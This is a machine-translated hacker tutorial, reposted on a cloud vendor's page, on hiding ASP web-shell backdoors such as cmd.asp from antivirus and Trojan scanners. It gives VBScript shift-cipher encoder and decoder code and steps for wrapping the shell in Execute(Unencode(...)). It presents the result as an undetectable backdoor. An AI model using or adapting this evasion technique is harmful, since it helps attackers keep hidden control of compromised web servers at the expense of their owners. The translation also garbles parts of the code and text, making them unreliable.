The ultimate disguise of ASP's backdoor

Source: Internet
Author: User
Tags chr copy decrypt end variable
Remember when the ASP Trojan came out of the so-called "never be killed Trojan", oh, today, any anti-virus software can kill the ^_^ Oh, by Trojans to avoid anti-virus software thinking impact, we can also give ASP Trojan "Shell" (hehe, of course, not with UPX, etc.). What are you waiting for? Please look down.

In fact, this idea is very simple, that is, to encode the ASP code, the implementation of decoding. Here are two methods, one is to use Microsoft's tool script encoder, and the second is to take advantage of ASP's execute function.


Let's talk about script encoder. This dongdong can be in the official website of Microsoft free to come down, and also give the detailed use explanation, here don't say more. But after it encrypted file will have <%@ LANGUAGE = Vbscript.encode%>, hehe, give, the administrator see this sentence to know this ASP file is encrypted. How do you decrypt it? A decryption software is provided here ("click into Download"). Now know, Microsoft's script encoder not insurance, so, we have to write a program to come out "shell."


The ASP's execute function is to execute the string, which means that the ASP statement can be written as a string and executed with execute. For example, this line of code: Execute ("Response.Write (" "Hackerxfiles") "), the effect is equivalent to executing Response.Write (" Hackerxfiles "). Here, because the Dongdong in the Execute function is a string, we encounter quotation marks to double write. Well, since execute is a string, then we can take the inside of the Dongdong to encrypt.

How do you encrypt it? Well, just use the simplest shift method. Please look at the code:


But=1
Cc=replace (Nr,vbcrlf, "Hu")
For i= 1 to Len (cc)
If Mid (cc,i,1) <> "Hu" Then
PK=ASC (Mid (cc,i,1)) +but
If pk>126 Then
pk=pk-95
ElseIf Pk<32 Then
Pk=pk+95
End If
TEMP=TEMP&AMP;CHR (PK)
Else
temp=temp& "Hu"
End If
Next
Temp=replace (temp, "" "", "" "" "")
Response.Write (temp)

This code is the cyclic shift method under ASP. The variable but is the number of digits that can be changed. Oh, how to call the loop it? Because the program compares the ASCII code of the character, it is processed when it is greater than 126 or less than 32 o'clock, so that the range is 32~126. This prevents Windows from appearing characters. This is also the first reason to replace the return line feed. Here I wrote a shift encryption of the ASP program xor.asp attached, I hope to help you.

Then let's take a look at the above code to Response.Write ("Hackerxfiles") after the result of encryption: "Sftqpotf/xsjuf" #ibdlfsYgjmft #* ", hey, this time the immortal also see not understand it ^_^

Since added the secret, of course, to decrypt, look at the decryption code:

function Unencode (temp)
But=1 ' This is the number of digits moved by the shift Method! Note Modify the consistency here with the encryption used
For I =1 to Len (temp)
If Mid (temp,i,1) <> "Hu" Then
PK=ASC (Mid (temp,i,1))-but
If pk>126 Then
pk=pk-95
ElseIf Pk<32 Then
Pk=pk+95
End If
A=A&AMP;CHR (PK)
Else
A=a&vbcrlf
End If
Next
Unencode=a
End Function

Oh, now know how to execute it, just call this decryption function is: Execute (unencode ("sftqpotf/xsjuf) #ibdlfsYgjmft #*"), how, is not the smooth implementation of!

Here to give you a demonstration, so that we can understand how to encrypt the ASP Trojan. Because of the Sea of ASP Trojan code too much, I am lazy, take that dapper cmd.asp to demonstrate it!

First run the xor.asp I wrote, and then open cmd.asp with Notepad, copy the ASP code part of it to the Xor.asp text box (see picture),



Fill in the shift parameters (here I use 1), point "conversion", hehe, the result came out. Then create a new text document, copy the contents of the cmd.asp, and add the contents of the Unencode function in front (note that the value of the variable but in the Unencode function is the same as the value of the shift parameter selected in the encryption), and then replace the ASP portion of it with execute ( Unencode (HU)), in which Hu assigns a value with the result of the encryption obtained in the previous step. Oh, and then save the ASP file is OK! Here's a few more words. If the code is longer, it can be divided into several pieces of encryption, and then a few more execute execution is, but to be aware of the need to ensure the integrity of the ASP code, that is, can not be associated with the code such as if, end if divided into two execute.

Look, it can also run!



The 8 CD-ROM has a think easy ASP Trojan hunting device, oh, just handy to detect our results today. Hey, look at the results, it on the original version of the cmd.asp and with the script encoder added to the sea top net of the 2005 version can be detected, and we just crafted the xcmd.asp but nothing is detected! Oh



Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.